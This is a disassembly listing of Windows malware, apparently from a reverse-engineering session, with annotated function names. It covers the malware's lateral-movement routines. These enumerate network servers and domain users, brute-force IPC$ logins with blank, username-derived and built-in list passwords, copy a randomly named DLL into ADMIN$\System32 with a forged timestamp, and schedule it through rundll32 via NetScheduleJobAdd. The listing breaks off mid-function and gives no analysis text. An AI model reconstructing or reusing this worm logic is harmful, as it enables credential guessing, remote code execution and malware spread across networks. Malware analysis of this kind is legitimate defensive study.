loc_9A926B: ; CODE XREF: sub_9A9237+A�j
mov eax, edi
pop edi
retn
sub_9A9237 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_cancel_connection_to_server proc near ; CODE XREF: sub_connect2localdomain_and_run_remote_dll+28�p
Name = word ptr -208h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
push [ebp+arg_0]
lea eax, [ebp+Name]
push offset aSIpc ; "\\\\%s\\IPC$"
push 104h ; Count
push eax ; Dest
call ds:_snwprintf
and [ebp+var_2], 0
add esp, 10h
push 1 ; fForce
push 0 ; dwFlags
lea eax, [ebp+Name]
push eax ; lpName
call WNetCancelConnection2W
xor eax, eax
leave
retn
sub_cancel_connection_to_server endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_connect_to_server(int,LPCWSTR lpUserName,LPCWSTR lpPassword)
sub_connect_to_server proc near ; CODE XREF: sub_connect2localdomain_and_run_remote_dll+F�p
Dest = word ptr -228h
var_22 = word ptr -22h
Dst = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
lpUserName = dword ptr 0Ch
lpPassword = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 228h
push esi
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aSIpc ; "\\\\%s\\IPC$"
push 104h ; Count
push eax ; Dest
xor esi, esi
call ds:_snwprintf
push 20h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_22], si
call memset
add esp, 1Ch
push esi ; dwFlags
push [ebp+lpUserName] ; lpUserName
lea eax, [ebp+Dest]
push [ebp+lpPassword] ; lpPassword
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push eax ; lpNetResource
mov [ebp+var_14], 3
mov [ebp+var_10], offset Str
call WNetAddConnection2W
test eax, eax
jnz short loc_9A9313
inc esi
loc_9A9313: ; CODE XREF: sub_connect_to_server+62�j
mov eax, esi
pop esi
leave
retn
sub_connect_to_server endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_run_dll_remote_host(LPCWSTR lpWideCharStr)
sub_run_dll_remote_host proc near ; CODE XREF: sub_connect2localdomain_and_run_remote_dll+1E�p
FindFileData = _WIN32_FIND_DATAW ptr -864h
FileName = word ptr -614h
var_40E = word ptr -40Eh
Servername = word ptr -40Ch
var_206 = word ptr -206h
var_204 = byte ptr -204h
var_186 = word ptr -186h
MultiByteStr = byte ptr -184h
var_183 = byte ptr -183h
var_80 = byte ptr -80h
var_6C = byte ptr -6Ch
Dest = word ptr -50h
Dst = dword ptr -34h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_28 = dword ptr -28h
Source = word ptr -24h
SystemTime = _SYSTEMTIME ptr -1Ch
JobId = dword ptr -0Ch
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 864h
mov al, byte ptr WindowName ; "recv"
push ebx
push esi
push edi
push 40h
pop ecx
mov [ebp+MultiByteStr], al
xor eax, eax
lea edi, [ebp+var_183]
rep stosd
xor ebx, ebx
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
stosw
stosb
mov esi, 104h
push esi ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
mov [ebp+var_4], ebx
push ebx ; dwFlags
push ebx ; CodePage
call ds:WideCharToMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; Str
call strlen
push eax
lea eax, [ebp+MultiByteStr]
push eax
call sub_9A9237
xor eax, 45419005h
push eax ; Seed
call ds:srand
call ds:rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+Dest]
add edx, 5
push edx
push eax
call sub_9AC672
mov edi, ds:wcscat
lea eax, [ebp+Dest]
push offset a_ ; "."
push eax ; Dest
call edi ; wcscat
lea eax, [ebp+Dest]
push eax ; Source
lea eax, [ebp+var_6C]
push eax ; Dest
call ds:wcscpy
add esp, 28h
loc_9A93C0: ; CODE XREF: sub_run_dll_remote_host+D3�j
call ds:rand
push 3
cdq
pop ecx
idiv ecx
lea eax, [ebp+Source]
inc edx
push edx
push eax
call sub_9AC672
lea eax, [ebp+Source]
push offset Str2 ; "dll"
push eax ; Str1
call ds:wcscmp
add esp, 10h
test eax, eax
jz short loc_9A93C0
call sub_call_srand_with_seed_from_thread_id
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call edi ; wcscat
lea eax, [ebp+var_6C]
push offset Str2 ; "dll"
push eax ; Dest
call edi ; wcscat
mov edi, ds:_snwprintf
lea eax, [ebp+Dest]
push eax
push [ebp+lpWideCharStr]
lea eax, [ebp+FileName]
push offset aSAdminSystem32 ; "\\\\%s\\ADMIN$\\System32\\%s"
push esi ; Count
push eax ; Dest
call edi ; _snwprintf
lea eax, [ebp+var_6C]
push eax
push [ebp+lpWideCharStr]
lea eax, [ebp+Servername]
push offset aSAdminSystem32 ; "\\\\%s\\ADMIN$\\System32\\%s"
push esi ; Count
push eax ; Dest
mov [ebp+var_40E], bx
call edi ; _snwprintf
add esp, 38h
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+Servername]
push eax ; lpFileName
mov [ebp+var_206], bx
call ds:FindFirstFileW
cmp eax, 0FFFFFFFFh
jz short loc_9A947E
push eax ; hFindFile
call ds:FindClose
cmp [ebp+FindFileData.nFileSizeLow], ebx
jz short loc_9A947E
loc_9A9472: ; CODE XREF: sub_run_dll_remote_host+191�j
; sub_run_dll_remote_host+19E�j
mov [ebp+var_4], 1
jmp loc_9A95E6
; ---------------------------------------------------------------------------
loc_9A947E: ; CODE XREF: sub_run_dll_remote_host+149�j
; sub_run_dll_remote_host+158�j
push ebx ; hTemplateFile
push 6 ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileW
cmp eax, 0FFFFFFFFh
mov [ebp+JobId], eax
jnz short loc_9A94B8
call ds:GetLastError
cmp eax, 50h
jz short loc_9A9472
cmp eax, 0B7h
jnz loc_9A95E6
jmp short loc_9A9472
; ---------------------------------------------------------------------------
loc_9A94B8: ; CODE XREF: sub_run_dll_remote_host+186�j
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
mov [ebp+NumberOfBytesWritten], ebx
push lpBuffer ; lpBuffer
push eax ; hFile
call ds:WriteFile
test eax, eax
jz short loc_9A94E9
mov eax, [ebp+NumberOfBytesWritten]
cmp eax, nNumberOfBytesToWrite
jnz short loc_9A94E9
mov [ebp+var_4], 1
loc_9A94E9: ; CODE XREF: sub_run_dll_remote_host+1BD�j
; sub_run_dll_remote_host+1C8�j
push [ebp+JobId] ; hObject
call ds:CloseHandle
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+FileName]
push eax ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call ds:WideCharToMultiByte
test eax, eax
jz short loc_9A951E
lea eax, [ebp+MultiByteStr]
push eax ; lpFileName
call sub_set_file_time_to_kernel32_time
pop ecx
loc_9A951E: ; CODE XREF: sub_run_dll_remote_host+1F7�j
cmp [ebp+var_4], ebx
jz loc_9A95D9
call ds:rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_80]
add edx, 5
push edx
push eax
call sub_9AC672
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+Dest]
push eax
push offset aRundll32_exeSS ; "rundll32.exe %s,%s"
lea eax, [ebp+var_204]
push 40h ; Count
push eax ; Dest
call edi ; _snwprintf
push [ebp+lpWideCharStr]
lea eax, [ebp+Servername]
push offset aS ; "\\\\%s"
push esi ; Count
push eax ; Dest
mov [ebp+var_186], bx
call edi ; _snwprintf
add esp, 2Ch
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
mov [ebp+var_206], bx
call ds:GetLocalTime
inc [ebp+SystemTime.wHour]
cmp [ebp+SystemTime.wHour], 18h
jb short loc_9A9596
add [ebp+SystemTime.wHour], 0FFE8h
loc_9A9596: ; CODE XREF: sub_run_dll_remote_host+276�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
movzx eax, [ebp+SystemTime.wHour]
imul eax, 36EE80h
mov [ebp+Dst], eax
lea eax, [ebp+var_204]
mov [ebp+var_28], eax
add esp, 0Ch
lea eax, [ebp+JobId]
push eax ; JobId
lea eax, [ebp+Dst]
push eax ; Buffer
lea eax, [ebp+Servername]
push eax ; Servername
mov [ebp+var_2C], 7Fh
mov [ebp+var_2B], 11h
call NetScheduleJobAdd
jmp short loc_9A95E6
; ---------------------------------------------------------------------------
loc_9A95D9: ; CODE XREF: sub_run_dll_remote_host+209�j
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:DeleteFileW
loc_9A95E6: ; CODE XREF: sub_run_dll_remote_host+161�j
; sub_run_dll_remote_host+198�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_run_dll_remote_host endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_enumerate_domains_in_server(LPCWSTR servername)
sub_enumerate_domains_in_server proc near ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+2B�p
; sub_enumerate_domains_in_server_and_run_dll+3A�p
totalentries = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
resume_handle = dword ptr -10h
entriesread = dword ptr -0Ch
var_8 = dword ptr -8
Buffer = dword ptr -4
servername = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
xor ebx, ebx
push edi
xor esi, esi
mov [ebp+Buffer], ebx
mov [ebp+resume_handle], ebx
xor edi, edi
loc_9A9603: ; CODE XREF: sub_enumerate_domains_in_server+B9�j
lea eax, [ebp+resume_handle]
push eax ; resume_handle
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
push 0FFFFFFFFh ; prefmaxlen
lea eax, [ebp+Buffer]
push eax ; bufptr
push 0 ; filter
push 1 ; level
push [ebp+servername] ; servername
call NetUserEnum
test eax, eax
mov [ebp+var_18], eax
jz short loc_9A962F
cmp eax, 0EAh
jnz short loc_9A96AD
loc_9A962F: ; CODE XREF: sub_enumerate_domains_in_server+38�j
cmp [ebp+Buffer], 0
jz short loc_9A96A0
add edi, [ebp+entriesread]
lea eax, ds:4[edi*4]
push eax ; NewSize
push esi ; Memory
mov [ebp+var_14], edi
call ds:realloc
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_9A9694
and [ebp+var_8], 0
cmp [ebp+entriesread], 0
jbe short loc_9A9690
xor edi, edi
loc_9A965E: ; CODE XREF: sub_enumerate_domains_in_server+9D�j
mov eax, [ebp+Buffer]
add eax, edi
cmp dword ptr [eax+0Ch], 0
jz short loc_9A967F
test dword ptr [eax+18h], 2
jnz short loc_9A967F
push dword ptr [eax] ; Str
call ds:_wcsdup
mov [esi+ebx*4], eax
pop ecx
inc ebx
loc_9A967F: ; CODE XREF: sub_enumerate_domains_in_server+79�j
; sub_enumerate_domains_in_server+82�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add edi, 20h
cmp eax, [ebp+entriesread]
jb short loc_9A965E
mov edi, [ebp+var_14]
loc_9A9690: ; CODE XREF: sub_enumerate_domains_in_server+6C�j
and dword ptr [esi+ebx*4], 0
loc_9A9694: ; CODE XREF: sub_enumerate_domains_in_server+62�j
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
and [ebp+Buffer], 0
loc_9A96A0: ; CODE XREF: sub_enumerate_domains_in_server+45�j
cmp [ebp+var_18], 0EAh
jz loc_9A9603
loc_9A96AD: ; CODE XREF: sub_enumerate_domains_in_server+3F�j
cmp [ebp+Buffer], 0
jz short loc_9A96BB
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A96BB: ; CODE XREF: sub_enumerate_domains_in_server+C3�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_enumerate_domains_in_server endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_connect2localdomain_and_run_remote_dll(int lpWideCharStr,LPCWSTR lpUserName,LPCWSTR lpPassword)
sub_connect2localdomain_and_run_remote_dll proc near ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+12�p
; sub_enumerate_domains_in_server_and_run_dll+6D�p ...
lpWideCharStr = dword ptr 8
lpUserName = dword ptr 0Ch
lpPassword = dword ptr 10h
push ebp
mov ebp, esp
push esi
push [ebp+lpPassword] ; lpPassword
xor esi, esi
push [ebp+lpUserName] ; lpUserName
push [ebp+lpWideCharStr] ; int
call sub_connect_to_server
add esp, 0Ch
test eax, eax
jz short loc_9A96F1
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_run_dll_remote_host
push [ebp+lpWideCharStr]
mov esi, eax
call sub_cancel_connection_to_server
pop ecx
pop ecx
loc_9A96F1: ; CODE XREF: sub_connect2localdomain_and_run_remote_dll+19�j
push 3Ch ; dwMilliseconds
call ds:Sleep
mov eax, esi
pop esi
pop ebp
retn
sub_connect2localdomain_and_run_remote_dll endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_enumerate_domains_in_server_and_run_dll(LPCWSTR lpWideCharStr)
sub_enumerate_domains_in_server_and_run_dll proc near ; CODE XREF: sub_enumerate_domains_and_run_dll+78�p
Memory = dword ptr -104h
Password = word ptr -100h
lpWideCharStr = dword ptr 4
sub esp, 104h
push ebx
push 0 ; lpPassword
push 0 ; lpUserName
push [esp+110h+lpWideCharStr] ; lpWideCharStr
call sub_connect2localdomain_and_run_remote_dll
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jnz loc_9A9883
push [esp+108h+lpWideCharStr] ; servername
call sub_enumerate_domains_in_server
test eax, eax
pop ecx
mov [esp+108h+Memory], eax
jnz short loc_9A974A
push eax ; servername
call sub_enumerate_domains_in_server
test eax, eax
pop ecx
mov [esp+108h+Memory], eax
jz loc_9A9883
loc_9A974A: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+37�j
push ebp
mov ebp, ds:wcslen
push esi
mov esi, [esp+110h+Memory]
push edi
loc_9A9757: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+171�j
cmp dword ptr [esi], 0
jz loc_9A9875
mov eax, [esi]
push eax ; lpPassword
push eax ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_connect2localdomain_and_run_remote_dll
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jnz loc_9A9861
push dword ptr [esi] ; Str
call ebp ; wcslen
test eax, eax
pop ecx
jz loc_9A9818
push dword ptr [esi] ; Str
call ebp ; wcslen
lea eax, ds:2[eax*4]
push eax ; Size
call ds:malloc
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A9818
push dword ptr [esi] ; Source
push edi ; Dest
call ds:wcscpy
push dword ptr [esi] ; Source
push edi ; Dest
call ds:wcscat
push edi ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+12Ch+lpWideCharStr] ; lpWideCharStr
call sub_connect2localdomain_and_run_remote_dll
mov ebx, eax
add esp, 1Ch
test ebx, ebx
jnz short loc_9A980C
push dword ptr [esi] ; Str
call ebp ; wcslen
test eax, eax
pop ecx
jle short loc_9A97F3
loc_9A97D7: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+F3�j
push dword ptr [esi] ; Str
call ebp ; wcslen
mov ecx, [esi]
sub eax, ebx
mov ax, [ecx+eax*2-2]
mov [edi+ebx*2], ax
push dword ptr [esi] ; Str
inc ebx
call ebp ; wcslen
cmp ebx, eax
pop ecx
pop ecx
jl short loc_9A97D7
loc_9A97F3: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+D7�j
and word ptr [edi+ebx*2], 0
push edi ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_connect2localdomain_and_run_remote_dll
add esp, 0Ch
mov ebx, eax
loc_9A980C: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+CE�j
push edi ; Memory
call ds:free
test ebx, ebx
pop ecx
jnz short loc_9A9861
loc_9A9818: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+86�j
; sub_enumerate_domains_in_server_and_run_dll+A4�j
xor edi, edi
loc_9A981A: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+161�j
cmp edi, 3E4h
jnb short loc_9A9861
push 80h ; cchWideChar
lea eax, [esp+118h+Password]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push off_9BA010[edi] ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar
test eax, eax
jz short loc_9A985A
lea eax, [esp+114h+Password]
push eax ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_connect2localdomain_and_run_remote_dll
add esp, 0Ch
mov ebx, eax
loc_9A985A: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+142�j
add edi, 4
test ebx, ebx
jz short loc_9A981A
loc_9A9861: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+79�j
; sub_enumerate_domains_in_server_and_run_dll+118�j ...
push dword ptr [esi] ; Memory
call ds:free
add esi, 4
test ebx, ebx
pop ecx
jz loc_9A9757
loc_9A9875: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+5C�j
push [esp+114h+Memory] ; Memory
call ds:free
pop ecx
pop edi
pop esi
pop ebp
loc_9A9883: ; CODE XREF: sub_enumerate_domains_in_server_and_run_dll+1E�j
; sub_enumerate_domains_in_server_and_run_dll+46�j
push 7D0h ; dwMilliseconds
call ds:Sleep
mov eax, ebx
pop ebx
add esp, 104h
retn
sub_enumerate_domains_in_server_and_run_dll endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_enumerate_domains_and_run_dll proc near ; CODE XREF: sub_thread_infect_locally+16�p
totalentries = dword ptr -10h
var_C = dword ptr -0Ch
entriesread = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push edi
xor edi, edi
push edi ; resume_handle
push edi ; domain
push 0FFFFFFFFh ; servertype
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
push 0FFFFFFFFh ; prefmaxlen
lea eax, [ebp+Buffer]
push eax ; bufptr
push 65h ; level
push edi ; servername
mov [ebp+var_C], edi
mov [ebp+entriesread], edi
mov [ebp+Buffer], edi
call NetServerEnum
cmp eax, edi
jz short loc_9A98D9
cmp eax, 0EAh
jnz short loc_9A9928
cmp [ebp+Buffer], edi
jz short loc_9A9935
cmp [ebp+entriesread], edi
jz short loc_9A9928
loc_9A98D9: ; CODE XREF: sub_enumerate_domains_and_run_dll+2E�j
push ebx
xor ebx, ebx
cmp [ebp+entriesread], edi
jbe short loc_9A9927
push esi
xor esi, esi
loc_9A98E4: ; CODE XREF: sub_enumerate_domains_and_run_dll+8C�j
mov eax, [ebp+Buffer]
add eax, esi
test byte ptr [eax+11h], 10h
jz short loc_9A991D
cmp dword ptr [eax+8], 4
jbe short loc_9A991D
push offset word_9BAF80 ; Str2
push dword ptr [eax+4] ; Str1
call ds:wcscmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A991D
mov eax, [ebp+Buffer]
push dword ptr [esi+eax+4] ; lpWideCharStr
call sub_enumerate_domains_in_server_and_run_dll
pop ecx
mov [ebp+var_C], 1
loc_9A991D: ; CODE XREF: sub_enumerate_domains_and_run_dll+55�j
; sub_enumerate_domains_and_run_dll+5B�j ...
inc ebx
add esi, 18h
cmp ebx, [ebp+entriesread]
jb short loc_9A98E4
pop esi
loc_9A9927: ; CODE XREF: sub_enumerate_domains_and_run_dll+47�j
pop ebx
loc_9A9928: ; CODE XREF: sub_enumerate_domains_and_run_dll+35�j
; sub_enumerate_domains_and_run_dll+3F�j
cmp [ebp+Buffer], edi
jz short loc_9A9935
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A9935: ; CODE XREF: sub_enumerate_domains_and_run_dll+3A�j
; sub_enumerate_domains_and_run_dll+93�j
mov eax, [ebp+var_C]
pop edi
leave
retn
sub_enumerate_domains_and_run_dll endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_impersonate_loggedon_and_get_workstation_info proc near ; CODE XREF: sub_thread_infect_locally+F�p
nSize = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push edi
call sub_Impersonate_loggedon_user_for_process
mov edi, eax
call sub_call_srand_with_seed_from_thread_id
and [ebp+Buffer], 0
lea eax, [ebp+Buffer]
push eax ; bufptr
push 64h ; level
push 0 ; servername
call NetWkstaGetInfo
test eax, eax
jnz short loc_9A9985
mov eax, [ebp+Buffer]
push 104h ; Count
push dword ptr [eax+4] ; Source
push offset word_9BAF80 ; Dest
call ds:wcsncpy
add esp, 0Ch
and word_9BB186, 0
jmp short loc_9A999B
; ---------------------------------------------------------------------------
loc_9A9985: ; CODE XREF: sub_impersonate_loggedon_and_get_workstation_info+25�j
lea eax, [ebp+nSize]
push eax ; nSize
push offset word_9BAF80 ; lpBuffer
mov [ebp+nSize], 104h
call ds:GetComputerNameW
loc_9A999B: ; CODE XREF: sub_impersonate_loggedon_and_get_workstation_info+48�j
cmp [ebp+Buffer], 0
jz short loc_9A99A9
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A99A9: ; CODE XREF: sub_impersonate_loggedon_and_get_workstation_info+64�j
mov eax, edi
pop edi
leave
retn
sub_impersonate_loggedon_and_get_workstation_info endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_thread_infect_locally(LPVOID)
sub_thread_infect_locally proc near ; DATA XREF: sub_infect_locally+9�o
push esi
mov esi, ds:Sleep
push edi
push 493E0h ; dwMilliseconds
loc_9A99BB: ; CODE XREF: sub_thread_infect_locally+2A�j
call esi ; Sleep
call sub_impersonate_loggedon_and_get_workstation_info
mov edi, eax
call sub_enumerate_domains_and_run_dll
test edi, edi
jz short loc_9A99D3
call ds:RevertToSelf
loc_9A99D3: ; CODE XREF: sub_thread_infect_locally+1D�j
push 249F00h
jmp short loc_9A99BB
sub_thread_infect_locally endp
; =============== S U B R O U T I N E =======================================
sub_infect_locally proc near ; CODE XREF: StartAddress+1A8�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push eax ; lpParameter
push offset sub_thread_infect_locally ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
pop ecx
retn
sub_infect_locally endp
; =============== S U B R O U T I N E =======================================
; BOOL __stdcall fn(HWND,LPARAM)
fn proc near ; DATA XREF: sub_9A9A29+15�o
hDlg = dword ptr 4
push 1 ; nIDDlgItem
push [esp+4+hDlg] ; hDlg
call ds:GetDlgItem
test eax, eax
jz short loc_9A9A23
push 0 ; lParam
push 0 ; wParam
push 0F5h ; Msg
push eax ; hWnd
call ds:PostMessageA
mov dword_9BB188, 1
loc_9A9A23: ; CODE XREF: fn+E�j
xor eax, eax
inc eax
retn 8
fn endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall sub_9A9A29(LPVOID)
sub_9A9A29 proc near ; DATA XREF: sub_9A9A64+127�o
dwThreadId = dword ptr 4
and dword_9BB188, 0
push esi
xor esi, esi
loc_9A9A33: ; CODE XREF: sub_9A9A29+33�j
cmp dword_9BB188, 0
jnz short loc_9A9A5E
push 0 ; lParam
push offset fn ; lpfn
push [esp+0Ch+dwThreadId] ; dwThreadId
call ds:EnumThreadWindows
push 0Ah ; dwMilliseconds
call ds:Sleep
inc esi
cmp esi, 5DCh
jl short loc_9A9A33
loc_9A9A5E: ; CODE XREF: sub_9A9A29+11�j
xor eax, eax
pop esi
retn 4
sub_9A9A29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9A64 proc near ; CODE XREF: sub_9A9C0D+5E�p
pvarg = VARIANTARG ptr -38h
ThreadId = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebx]
push esi
lea ecx, [ebp+var_1C]
push ecx
xor esi, esi
push ebx
mov [ebp+var_1C], esi
call dword ptr [eax+2Ch]
mov eax, [ebp+var_1C]
cmp eax, esi
jz loc_9A9C0A
lea edx, [ebp+var_14]
push edx
mov [ebp+var_8], esi
mov [ebp+var_14], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+1Ch]
mov eax, [ebp+var_14]
cmp eax, esi
jz short loc_9A9AB3
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push offset dword_9A2F70
push eax
call dword ptr [ecx]
mov eax, [ebp+var_14]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9AB3: ; CODE XREF: sub_9A9A64+36�j
cmp [ebp+var_8], esi
jz loc_9A9C01
lea eax, [ebp+pvarg]
push eax ; pvarg
call ds:VariantInit
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_9A9BF8
push edi
loc_9A9ADF: ; CODE XREF: sub_9A9A64+18D�j
cmp word ptr [ebp+pvarg.anonymous_0], 0Dh
jnz loc_9A9BD5
mov eax, dword ptr [ebp+pvarg.anonymous_0+8]
lea edx, [ebp+var_4]
push edx
push offset dword_9A2F60
mov [ebp+var_4], esi
mov ecx, [eax]
push eax
call dword ptr [ecx]
cmp [ebp+var_4], esi
jz loc_9A9BD5
mov eax, [ebx]
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_4]
mov [ebp+var_10], esi
push ebx
call dword ptr [eax+30h]
mov eax, [ebp+var_10]
cmp eax, esi
jz loc_9A9BCC
lea edx, [ebp+var_20]
push edx
mov [ebp+var_20], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
test byte ptr [ebp+var_20+1], 4
jz loc_9A9BC3
mov eax, [ebp+var_10]
lea edx, [ebp+var_18]
push edx
mov [ebp+var_18], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp [ebp+var_18], 8
jz short loc_9A9BC3
cmp [ebp+var_18], 9
jz short loc_9A9BC3
mov eax, [ebx]
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_4]
mov [ebp+var_C], esi
push ebx
call dword ptr [eax+28h]
mov eax, [ebp+var_C]
cmp eax, esi
jz short loc_9A9BC3
lea edx, [ebp+var_24]
push edx
mov [ebp+var_24], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp word ptr [ebp+var_24], si
jz short loc_9A9BBA
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push esi ; dwCreationFlags
call ds:GetCurrentThreadId
push eax ; lpParameter
push offset sub_9A9A29 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call ds:CreateThread
push 64h ; dwMilliseconds
mov edi, eax
call ds:Sleep
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
push esi ; dwExitCode
push edi ; hThread
call ds:TerminateThread
push edi ; hObject
call ds:CloseHandle
loc_9A9BBA: ; CODE XREF: sub_9A9A64+119�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9BC3: ; CODE XREF: sub_9A9A64+CF�j
; sub_9A9A64+E9�j ...
mov eax, [ebp+var_10]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9BCC: ; CODE XREF: sub_9A9A64+B8�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9BD5: ; CODE XREF: sub_9A9A64+80�j
; sub_9A9A64+9D�j
lea eax, [ebp+pvarg]
push eax ; pvarg
call ds:VariantClear
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_9A9ADF
pop edi
loc_9A9BF8: ; CODE XREF: sub_9A9A64+74�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9C01: ; CODE XREF: sub_9A9A64+52�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9C0A: ; CODE XREF: sub_9A9A64+1B�j
pop esi
leave
retn
sub_9A9A64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9A9C0D(LPVOID)
sub_9A9C0D proc near ; DATA XREF: sub_9A9CA1+50�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ppv = dword ptr -1Ch
